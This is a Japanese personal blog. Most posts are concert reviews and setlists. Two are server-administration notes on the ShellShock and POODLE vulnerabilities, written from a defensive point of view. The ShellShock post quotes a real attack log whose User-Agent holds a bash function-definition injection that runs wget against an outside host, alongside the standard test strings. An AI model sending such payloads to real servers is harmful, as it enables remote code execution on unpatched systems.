2014年12月23日火曜日

the HIATUS 「Closing Night - Keeper Of The Flame Tour 2014」 @ 日本武道館


the HIATUS初日本武道館

きっと無いと思ってたし、
やったら絶対最高のライブになるのも分ってた。

俺たちは待っていたけど、
大きい会場は好きじゃない、似合わないよという細見さんのポリシーも良いと思うし、
俺も大きい会場はあまり好きじゃない。

ライブが始まりだして真っ先に思ったのは、大きい会場にHIATUSの曲がメッチャあうじゃん!。
このライブに参加できた事を本当に誇りに思うし、ありがとうといいたい。

ライブの内容は初期曲から最新曲までまんべんなくお祭り騒ぎだし、
手話を取り入れるなんて新試みとか、これが全く違和感ない。凄い。
まだまだ満足も、前進をやめない姿勢とか、
いちいちかっこよかったです。

今年のベストアクトにダントツでなりました。
手話の方と一緒に歌った「Horse Riding」がキラッキラに輝いていて
あらためてこの曲のもつパワーに圧倒されました。



01.Interlude

02.Roller Coaster Ride Memories

03.The Ivy

04.The Flare

05.My Own Worst Enemy

06.Storm Racers

07.Centipede

08.Monkeys

09.Deerhounds

10.Bittersweet / Hatching Mayflies

11.Superblock

12.Horse Riding

13.Tales Of Sorrow Street

14.Souls

15.Thirst

16.Unhurt

17.Lone Train Running

18.Something Ever After

19.Insomnia

20.紺碧の夜に

21.Ghost In The Rain

22.Twisted Maple Trees

23.Silver Birch

24.Waiting For The Sun

Horse Riding - Horse Riding - Single

Keeper Of The Flame
Keeper Of The Flame
posted with amazlet at 15.01.02
the HIATUS
ユニバーサルミュージック (2014-03-26)
売り上げランキング: 4,057



2014年12月13日土曜日

phatmans after school / さよならスペースシャトル


最近になってすごく注目され出してきましたね。
来年ヒットするバンドナンバー1なんていわれつつありますね。

ニューアルバムはCD+ライブCD版を買いましたが、
入門にはすごくよく、これは売れるなと思わせるクオリティです。

ミニアルバムから知っている人からすると
昔の曲の再録が多いので、少し残念でしたが、アルバムの表題曲にあるように
この曲のだけでも聴く価値ありです!

ミニアルバムの曲の中にもまだまだ良い曲がたくさんあるので、
フルアルバムで満足せずにぜひこれを機会にしてください。

売れ線バンドになるのはうれしいですが、
「東京少年」のイメージが崩れないよう今のまま頑張ってほしいですね。


さよならスペースシャトル - セカイノコトハ


セカイノコトハ (初回限定盤B) CD+LIVE CD
phatmans after school
トイズファクトリー (2014-12-03)
売り上げランキング: 1,595


2014年12月7日日曜日

藍坊主 @ 新木場STUDIO COAST


aobozu LIVE 2014 ~蚕の鼓笛、繭は踊る~

今年もきました藍坊主式忘年会

今年のhozzyは喉の調子がすごく悪い
最近あまりなかったのですっかり不安定だったのを思い出しました。

しかしそれを上回る懐かしい、うれしい曲の連続!
新曲やPV演出等、やっぱりお祭りに答えてくれるライブでした。

〆の曲がなんだか一番印象にのこっています。

01.ESTO
02.瞼の裏には
03.グッドパエリア
04.コイントス
05.ポランスキーナ
06.Lumo
07.柔らかいローウィン
08.向日葵
09.羽化の月
10.夏の銀景
11.水に似た感情
12.氷に似た感応
13.バタフライ
14.宇宙が広がるスピードで
15.オレンジテトラポット
16.鞄の中、心の中
---
17.オーケストラ
18.名もなき詩 [Mr.Children]
19.春風
---
20.Love & Peace
バタフライ - ココーノ


ココーノ (初回盤 2CD+DVD)
藍坊主
トイズファクトリー (2014-12-10)
売り上げランキング: 162


2014年11月29日土曜日

Base Ball Bear @ ZEPP Diver City


BaseBallBear 29歳最後のライブ

今年2度目のBBB!
失礼かもしれないが、こんなに大きい箱が似合わないバンドも珍しい。
曲のスケールは凄くいいしんだが、

ライブパフォーマンスが凄くニッチ!
そこがベボベらしくて良くて、ベボベのライブの楽しみでもある。
特に今回はアルバムに基づき丁寧にライブが作られています。

今回のアルバムがすごく好きで、
何度も何度もライブに行きたくなってしまいます。

もう青春ぽい無亜k氏のままではいられないというMCもあったけど、
変わらないものもないし、変わらないものもあるでしょう。

しかしファンファーレが聞こえない。
01.何才
02.アンビバレントダンサー
03.PERFECT BLUE
04.そんなに好きじゃなかった
05.STAND BY ME
06.Ghost Town
07.17才
08.スクランブル
09.方舟
10.The End
11.changes
12.CRAZY FOR YOUの季節
13.UNDER THE STAR LIGHT
14.光蘚 15.魔王
--
16.ELECTRIC SUMMER 17.カナリア


Changes - changes - EP



二十九歳(初回限定盤)(DVD付)
Base Ball Bear RHYMESTER
ユニバーサル ミュージック (2014-06-04)
売り上げランキング: 23,046


2014年11月22日土曜日

tacica @ 高崎CLUB FLEEZ


今年2度目のtacica

シングルLEOがあまりに好きすぎて参加したシングルツアーです。

MCでも言っていたんだけど、
シングルツアーはアルバムのツアーと違って縛りがないから色んな曲を選べる。

シングルのツアーは本数が少なかったりする事もあって、
あんまり参加したことが無いんですが、いいもんですね!
シングルツアーだから曲の幅が自由だし、プレイが自由でした。

途中、「人生みたい」という?下りがあって思ったんですが、
tacicaってそういう過去から今をつなぐようなそんな曲が多い印象があります。

色々タイアップしているのにいまいち人気に発火しなくてやきもきしますが、
今後も素敵な曲を期待しています。

ちなみに、
ライブ恒例のグッズ紹介はベースの小西さんが担当しています。
相変わらずみんなタドタドしいtacicaというのは変わりません(笑)。




LEO - LEO - Single


LEO
LEO
posted with amazlet at 14.11.22
tacica
SME (2014-09-10)
売り上げランキング: 12,139


2014年11月15日土曜日

KNOT FEST @ 幕張メッセ

ダークカーニバルに行ってきたよ!
KNOT FEST JAPAN 2014

FESの第一回目に参加するのは人生初だったので、
そのテンションもありながら、天気も良くて最高の1日でした。

参加したのは1日目の11/15日。
そこにポップは無かったよ、黒塗りのシャツに、重いサウンドとパワープッシュの客
暴れて、踊って頭ふって1ライブも抜きを許さないすげーパフォーマンスでした。

あんまりラウドだパンクだメタルだは聞かない方なんだけど、
これはコアファンがいる理由が分かりますわ。
脳汁が汗と一緒に出るような爆発感がたまりませんね。

PapaRoach
LIMP BIZKIT
Slipknot

この辺の鉄板感は凄かったです。
LIMPのライブはCDからじゃ伝わらないかっこよさだったし、
Slipknotのパフォーマンスは日本では真似できない、最高のセットリストでした。

明日は首の筋肉痛だね!

残念だったのは、1っ回目だったからかな?
物販に3時間かかるような売り場の状況や、オフィシャルバーの店員が
酒造りがたどたどしかったり、次回も来てほしいから、頑張ってほしいです。



The Devil In I - .5: The Gray Chapter (Special Edition)


.5:ザ・グレイ・チャプター(2CDスペシャル・エディション)
スリップノット
ワーナーミュージック・ジャパン (2014-10-15)
売り上げランキング: 275



2014年11月9日日曜日

Northern19 @ LIQUIDROOM



Northernワンマン!

なんだかんだNorthernは初参加です。
今までなんだかんだ縁がなく、見れなったNorthernですよ!

ライブはしっかり満員(?)
アルバムや曲から受けるイメージがどのようなライブを作るのかすごく楽しみでしたが、
やっぱりね!と言いたくなる、イメージ通りの楽しさにあふれたライブでした。

バンドも、お客も一体となって楽しんでいる。
それがダイレクトに伝わりあう凄くいいライブでした。

本当に曲たちから受けるイメージ通りです。
意外だったのはこうゆうバンドのライブに多い、
テンション上がりすぎて周りに迷惑かけたり、サークル連発しまくるみたいのが少なかったこと。
なんかこの辺からも会場全体でライブを作っているような、いいライブでした。

いいね、笑顔が素で出てくるライブは何度でも、いつまでも参加したくなります。

01.START AGAIN
02.WINDING ROAD
03.BRAND-NEW
04.DIVE
05.WE'LL BE ALRIGHT
06.THE DEPARTURE
07.HEARTBREAKER
08.TRYOUT
09.Q
10.BLOWIN'
11.FACE TO FACE
12.SOS
13.MOURNING RAIN
14.WISH
15.DON'T GO AWAY
16.HATE YOU
17.DEVIL'S FOOD
18.SNOWBLIND
19.YES, I CAN FLY
20.BLUE SKIES, BROKEN BIKE... SAME FAVORITE SONGS
21.TONIGHT, TONIGHT
22.THE NIGHT WITHOUT A STAR
23.FOOLS LIKE ME
24.HAPPY ENDING MOTION PICTURE
25.MORATORIUM
26.TRUTH
27.SMILE FOR PEACE
28.STAY YOUTH FOREVER
29.HELLO GOOD-BYE
30.GLORIA
-- アンコール1 --
31.GO
32.BELIEVE SONG
33.NEVER ENDING STORY
-- アンコール2 --
34.SUMMER
35.START AGAIN
SMILE FOR PEACE - SMILE


DISCOVERY(DVD付)
DISCOVERY(DVD付)
posted with amazlet at 14.11.10
Northern19
WIRED ReCORDS (2014-06-25)
売り上げランキング: 42,497



2014年11月8日土曜日

SPECIAL OTHERS ACOUSTIC / LIGHT


最近私にとってスペアザの季節がやってまいりました。
大分遅いですが。

やっぱりというか、アコースティックもスペアザにはバシッとはまる
なのに新鮮さが来るという、幸福感です。

エレクトリックの疾走感もあり、アコースティックの優しさもある。
なんか無限に聞いていられそうになるくらい、好きです。


LIGHT - LIGHT


LIGHT(初回限定盤)
LIGHT(初回限定盤)
posted with amazlet at 14.11.08
SPECIAL OTHERS ACOUSTIC
ビクターエンタテインメント (2014-10-08)
売り上げランキング: 608



2014年10月19日日曜日

ShellShock bashコマンドインジェクション

これは凄い!

GNU Bash に OS コマンドインジェクションの脆弱性

bash の脆弱性対策について(CVE-2014-6271 等)


GNU Bash には、環境変数にシェル関数定義を設定して他のシェルプロセスに渡す機能と、環境変数で設定されたシェル関数定義を取り込む機能が存在します。関数定義に続きシェルコマンドが記述されている形で環境変数が設定されているとき、GNU Bash は関数定義を取り込む際にそのシェルコマンドを実行してしまいます


たぶんある程度しっかり作られたアプリケーションのサイトや、
最新のパッケージを使っている環境ではあまりこの影響の脆弱性をうけるサイトは少ないのかなという印象です。

私が管理しているサイトでは脆弱性の再現は1サイトしかありませんでした。

テストは簡単に、ChromeやFireFoxのユーザーエージェントを指定できるプラグインで、
env x='() { :;}; echo vulnerable' bash -c "echo this is a test"
のような値を設定してサイトを回遊ました。

ちなみに、実際に攻撃が成功してしまった環境はちょっと古いOS 5系の環境。
  • Cent OS 5
  • Apache 2.2 標準RPM
  • PHP 5.3 ソースインストール
実際にきていた攻撃は下記のようなアクセス。
62.210.75.170 - - [30/Sep/2014:07:42:45 +0900] "GET /index.html HTTP/1.1" 200 4872 "() { :; }; /bin/bash -c 'wget http://creditstat.ru/Y3Vwbm9vZGxlcy1tdXNldW0uanBTaGVsbFNob2NrU2FsdA== >> /dev/null'" "() { :; }; /bin/bash -c 'wget http://creditstat.ru/Y3Vwbm9vZGxlcy1tdXNldW0uanBTaGVsbFNob2NrU2FsdA== >> /dev/null'" 1281928
62.210.75.170 - - [30/Sep/2014:07:42:52 +0900] "GET /index.html HTTP/1.1" 200 4872 "() { :; }; /bin/bash -c 'wget http://creditstat.ru/Y3Vwbm9vZGxlcy1tdXNldW0uanBTaGVsbFNob2NrU2FsdA== >> /dev/null'" "() { :; }; /bin/bash -c 'wget http://creditstat.ru/Y3Vwbm9vZGxlcy1tdXNldW0uanBTaGVsbFNob2NrU2FsdA== >> /dev/null'" 1232626
62.210.75.170 - - [30/Sep/2014:07:42:59 +0900] "GET /index.html HTTP/1.1" 200 4872 "() { :; }; /bin/bash -c '/usr/bin/wget http://creditstat.ru/Y3Vwbm9vZGxlcy1tdXNldW0uanBTaGVsbFNob2NrU2FsdA== >> /dev/null'" "() { :; }; /bin/bash -c '/usr/bin/wget http://creditstat.ru/Y3Vwbm9vZGxlcy1tdXNldW0uanBTaGVsbFNob2NrU2FsdA== >> /dev/null'" 1227358
62.210.75.170 - - [30/Sep/2014:07:43:01 +0900] "GET /index.html HTTP/1.1" 200 4872 "() { :; }; /bin/bash -c '/usr/bin/wget http://creditstat.ru/Y3Vwbm9vZGxlcy1tdXNldW0uanBTaGVsbFNob2NrU2FsdA== >> /dev/null'" "() { :; }; /bin/bash -c '/usr/bin/wget http://creditstat.ru/Y3Vwbm9vZGxlcy1tdXNldW0uanBTaGVsbFNob2NrU2FsdA== >> /dev/null'" 1247845
実際に攻撃が成功すると、下記のようなメッセージがsyslogに出力されました。

Sep 30 07:42:23 GSA040014009 kernel: sh[26924]: segfault at 0000000000000000 rip 00000000004373c7 rsp 00007fff1f9b5610 error 4
Sep 30 07:42:23 GSA040014009 kernel: sh[26926]: segfault at 0000000000000000 rip 00000000004373c7 rsp 00007fff3edfcdb0 error 4
Sep 30 07:42:26 GSA040014009 kernel: sh[26928]: segfault at 0000000000000000 rip 00000000004373c7 rsp 00007fff3f09fb50 error 4
Sep 30 07:42:26 GSA040014009 kernel: sh[26930]: segfault at 0000000000000000 rip 00000000004373c7 rsp 00007fff22324de0 error 4
Sep 30 07:42:27 GSA040014009 kernel: sh[26932]: segfault at 0000000000000000 rip 00000000004373c7 rsp 00007fff880e3000 error 4
メモリのセグメンテーションエラーね。
そしてApacheのエラーログには親切に下記ログも
/bin/sh: wget: No such file or directory
/bin/sh: wget: No such file or directory
/bin/sh: wget: No such file or directory
--2014-09-30 07:42:38-- http://creditstat.ru/Y3Vwbm9vZGxlcy1tdXNldW0uanBTaGVsbFNob2NrU2FsdA==
Resolving creditstat.ru... 78.46.37.177
Connecting to creditstat.ru|78.46.37.177|:80... connected.
HTTP request sent, awaiting response... 404 Not Found
2014-09-30 07:42:38 ERROR 404: Not Found.
見事動作させられてますね、ありがとうございます。
他にはmailコマンドを実行させられたり、「/tmp」領域にファイルを配置されたり。
今回はユーザーエージェントにコードをセットされていたから分かりやすかったですが、
Cookieや他にログに残らないようなアクセスだと、なかなか検知は難しかったかもしれないですね。

実際どこに実行箇所があったかというと、HTML内に記述していた
<!--#exec cgi="~" -->
上記部分でした。
Apacheで"IncludeNOEXEC"していれば防げていたかもしれませんが・・・

対応策はBashのアップデートを上げるしか基本的には無いので、もちろんアップデート。
アップデートした場合、OSの再起動が必要なのか、いらいないとか。
ここはRedhatの情報に従って確認していきましょう。

特殊な細工がされた環境変数による Bash コードインジェクションの脆弱性 (CVE-2014-6271、CVE-2014-7169)

Bash変数を設定して起動しているサービスが無いか確認。


エクスポートされた Bash 機能を使用している場合は、影響を受けるサービスを再起動することが推奨されます。影響を受けるインタラクティブなユーザーが再ログインしたり、画面または tmux セッションを再起動したりする必要があるかもしれません。
これらの問題を修正するために提供された Bash アップデートは、この環境でエクスポートされた関数の名前を変更します。古いバージョンの Bash が関数をエクスポートしている場合、その関数はアップデート後に新しく起動した Bash プロセスでは認識されないため、定義されていない状態になります。サービスを再起動すると、新しいバージョンの Bashは、期待した名前で関数をエクスポートするため、再度表示されます。


# grep -l -z '[^)]=() {' /proc/[1-9]*/environ | cut -d/ -f3

とはいえ、変数が空になって後で上手く動いていないことが分かるのはやなので、
私の場合は再起動しました。

アップデート後はそれぞれの脆弱性が修正されている事を確認。
CVE-2014-6271

# env 'x=() { :;}; echo vulnerable' 'BASH_FUNC_x()=() { :;}; echo vulnerable' bash -c "echo test"
bash: warning: x: ignoring function definition attempt
bash: error importing function definition for `x'
bash: error importing function definition for `BASH_FUNC_x()'
test
RHSA-2014:1306、RHSA-2014:1311 および RHSA-2014:1312
# env 'x=() { :;}; echo vulnerable' 'BASH_FUNC_x()=() { :;}; echo vulnerable' bash -c "echo test"
bash: warning: x: ignoring function definition attempt
bash: error importing function definition for `BASH_FUNC_x'
test
CVE-2014-7169
# cd /tmp; rm -f /tmp/echo; env 'x=() { (a)=>\' bash -c "echo date"; cat /tmp/echo
date
cat:/tmp/echo:No such file or directory
以上で対応自体は完了。アップデートするだけの簡単な作業ですね。

今回の脆弱性はサイト上に問題が無くても、対象であればアップデートしたほうがいいでしょう。
今回の対応で面倒だったのは「もしも」の場合に備えて今のバージョンと同じパッケージを探しておくことでした。
OS6系ならまだまだ大丈夫ですが、5系はもう古いのはないですからね。
当時のメディアがあってよかった。

入門bash 第3版
入門bash 第3版
posted with amazlet at 14.10.18
Cameron Newham Bill Rosenblatt
オライリージャパン
売り上げランキング: 369,620

2014年10月18日土曜日

ストレイテナー / 冬の太陽


来た!

アルバムを前にすげぇ曲が来ましたね。
なんだかテナーっぽくないような、あれ?変わったかな?って気がするけど、
聴き終わるとテナーっぽい、最高の爽快感と、しびれるようなかっこよさ!

LOW IQ 01のアニバーサリーライブで聞いた時も鳥肌もんだったし、
MCで「かっこいっしょ?」って。しっているよ。最近ずっと聞いてるよ!

歌詞やメロディはどこか物悲しいのに、体が動かずにはいられない。
ライブでは一緒に叫ばずにはいられませんでしたね。


冬の太陽 - 冬の太陽/The World Record - EP


冬の太陽/The World Record(初回限定盤)(DVD付)
ストレイテナー
ユニバーサル ミュージック (2014-09-17)
売り上げランキング: 1,639



POODLE: SSLv3.0 脆弱性めも


いえい!深刻な脆弱性が多いぜ!

SSLv3 プロトコルに暗号化データを解読される脆弱性(POODLE 攻撃)
SSL v3 をサポートするプログラムは、中間者攻撃が可能な環境で、
Padding Oracle On Downgraded Legacy Encryption (POODLE) 攻撃の影響を受ける可能性があります。

SSL v3 プロトコルに対して、中間者攻撃により通信内容を解読する攻撃手法が報告されています。この攻撃手法は "POODLE" (Padding Oracle On Downgraded Legacy Encryption) と呼ばれています。

ウェブブラウザ等のプログラムの多くでは、上位のプロトコルで通信できない場合にプロトコルのバージョンをダウングレードして通信を行う機能 ("protocol downgrade dance") が実装されています。中間者攻撃(Man-In-the-Middle Attack) を通じて POODLE 攻撃を行う際には、この機能を悪用して SSL v3 による通信を行わせるように仕向けます。その後、SSL v3 でブロック暗号のCBCモードによる暗号化が行われている通信に対し、通信内容を解読します(パディングオラクル攻撃の一種)。現実的な攻撃シナリオとして、HTTP Cookie などの情報を取得する方法が挙げられています。

ふむ。

まず自サイトが対象なのかを確認。
詳しくはRedHatさんから教えていただきましょう。
POODLE: SSLv3.0 脆弱性 (CVE-2014-3566)

openssl s_client -connect "${`hostname`}:443" -ssl3
ホスト名のところを対象のサイトURLにして、アクセスします。
アクセス後、errorやwarningが出ずにサイトの証明書情報等が表示されたら有効化されていることになる。

if echo "${ret}" | grep -q 'Cipher.*0000'; then
echo "SSLv3 disabled"
else
echo "SSLv3 enabled"
fi

以前からSSLv3は安全でない暗号化方式であったため、
OpenSSLのソースパッケージはパッチをあてたものを公開していますが、
今後どのメーカーもそのような対応をするかは微妙なところです。

SSLv3を無効化した場合、どの程度に影響があるのかな?
古いフィーチャーフォン端末と、WindowsXPのIE6環境で実害が出るようです。

Docomoの場合
https://www.nttdocomo.co.jp/service/developer/make/content/ssl/spec/index.html
au KDDIの場合
http://www.au.kddi.com/ezfactory/web/
SoftBankの場合
http://creation.mb.softbank.jp/mc/tech/tech_web/web_ssl.html

auはちょっとTLSに対応しているのか情報があやふやですが、SHA2対応したときにアップデートしているらしいです。

そもそもSSL通信の際、どのような優先順位なんでしょうか。
SSL (Secure Sockets Layer) ハンドシェイクの概要
Cipher Suites in Schannel

SSLv3が選択肢にくるのは相当後ろですね。
今世の中的にはSSLv3はほぼ利用されていないというのが現状のようです。

しかし、ApacheでSSLサイトを立てようつすればデフォルトではSSLv3は有効になっているのが現状です。

今回の脆弱性自体は攻撃方法がそれほど簡単でもなく、まだ目立って攻撃が活発でもありません。
なのでメーカーによっては対応はそれほど活発でもないし、IPAもまだ発表はしていません。

しかし暗号化問題は「すみません、中身見られてました」では済まないことが多いので、
SSLv3を無効化することで対応可能なのであれば、してもよいレベルと思います。
今主流の暗号化プロトコルに問題が見つかったわけではないのですから。
モバイルサイトを運用している方は簡単には決められない事と思いますが。

ちなみにApacheでSSLv3を無効化する方法は簡単。

 SSLProtocol All -SSLv2 -SSLv3
設定ファイルに追記するだけですね。
RedHhatは下記のように案内していることからも、今後は標準パッケージでは無効化されてくるかもしれませんね。

Red Hat は、この問題と、今後の SSL 脆弱性の影響を受けないように、SSL および TLS 暗号化を提供する SSLv3 を無効にすることを推奨します。

SSL/TLS導入ガイドブック
井上 孝司 三木 秀治
毎日コミュニケーションズ
売り上げランキング: 191,638